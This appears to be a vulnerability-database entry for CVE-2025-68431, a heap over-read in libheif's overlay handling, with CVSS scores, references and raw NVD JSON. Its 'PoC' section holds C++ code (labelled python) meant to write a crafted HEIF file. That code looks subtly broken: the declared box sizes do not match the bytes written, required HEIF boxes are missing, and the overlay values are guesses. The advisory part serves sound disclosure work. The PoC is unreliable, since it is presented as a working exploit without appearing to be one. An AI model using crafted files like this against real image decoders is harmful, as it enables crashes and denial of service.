CVE-2025-68431

Description

libheif is an HEIF and AVIF file format decoder and encoder. Prior to version 1.21.0, a crafted HEIF that exercises the overlay image item path triggers a heap buffer over-read in `HeifPixelImage::overlay()`. The function computes a negative row length (likely from an unclipped overlay rectangle or invalid offsets), which then underflows when converted to `size_t` and is passed to `memcpy`, causing a very large read past the end of the source plane and a crash. Version 1.21.0 contains a patch. As a workaround, avoid decoding images using `iovl` overlay boxes.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:struktur:libheif:*:*:*:*:*:*:*:* - VULNERABLE

libheif < 1.21.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <cstdint>
#include <cstring>
#include <fstream>

// PoC for CVE-2025-68431: libheif heap buffer over-read in HeifPixelImage::overlay()
// This generates a malicious HEIF file with crafted overlay box that triggers the vulnerability

#pragma pack(1)
struct HEIFBox {
    uint32_t size;
    uint8_t type[4];  // 'ftyp', 'meta', 'iprp', 'iovl', etc.
    // box content follows
};

void create_malicious_heif(const char* filename) {
    std::ofstream f(filename, std::ios::binary);
    
    // ftyp box - file type
    HEIFBox ftyp = {0};
    ftyp.size = 16;
    memcpy(ftyp.type, "ftyp", 4);
    f.write(reinterpret_cast<char*>(&ftyp), 12);
    f.write("heic", 4);
    
    // meta box with crafted iovl overlay box
    // The iovl box contains invalid dimensions/offsets that cause
    // negative row_length calculation in overlay() function
    HEIFBox meta = {0};
    meta.size = 64;  // Crafted size
    memcpy(meta.type, "meta", 4);
    f.write(reinterpret_cast<char*>(&meta), 8);
    
    // iprp box (item properties)
    HEIFBox iprp = {0};
    iprp.size = 32;
    memcpy(iprp.type, "iprp", 4);
    f.write(reinterpret_cast<char*>(&iprp), 8);
    
    // iovl box - crafted overlay with invalid offsets
    HEIFBox iovl = {0};
    iovl.size = 24;
    memcpy(iovl.type, "iovl", 4);
    f.write(reinterpret_cast<char*>(&iovl), 8);
    
    // Overlay data with crafted dimensions to trigger negative row_length
    uint32_t overlay_data[] = {
        0xFFFFFFFF,  // Invalid width causing negative calculation
        0x00000000,  // Invalid height
        0x80000000,  // Negative offset that underflows when cast to size_t
        0x00000000
    };
    f.write(reinterpret_cast<char*>(overlay_data), sizeof(overlay_data));
    
    f.close();
}

int main() {
    create_malicious_heif("CVE-2025-68431.heic");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68431
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68431
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68431/
[4] VulDB https://vuldb.com/cve/CVE-2025-68431
[5] https://github.com/strukturag/libheif/commit/b8c12a7b70f46c9516711a988483bed377b78d46
[6] https://github.com/strukturag/libheif/releases/tag/v1.21.0
[7] https://github.com/strukturag/libheif/security/advisories/GHSA-j87x-4gmq-cqfq

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68431", "sourceIdentifier": "[email protected]", "published": "2025-12-29T19:15:56.933", "lastModified": "2026-02-25T14:53:34.747", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libheif is an HEIF and AVIF file format decoder and encoder. Prior to version 1.21.0, a crafted HEIF that exercises the overlay image item path triggers a heap buffer over-read in `HeifPixelImage::overlay()`. The function computes a negative row length (likely from an unclipped overlay rectangle or invalid offsets), which then underflows when converted to `size_t` and is passed to `memcpy`, causing a very large read past the end of the source plane and a crash. Version 1.21.0 contains a patch. As a workaround, avoid decoding images using `iovl` overlay boxes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:struktur:libheif:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.21.0", "matchCriteriaId": "BBD4D6C6-A38E-4C2C-AB9D-F82441BE2D4F"}]}]}], "references": [{"url": "https://github.com/strukturag/libheif/commit/b8c12a7b70f46c9516711a988483bed377b78d46", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/strukturag/libheif/releases/tag/v1.21.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/strukturag/libheif/security/advisories/GHSA-j87x-4gmq-cqfq", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}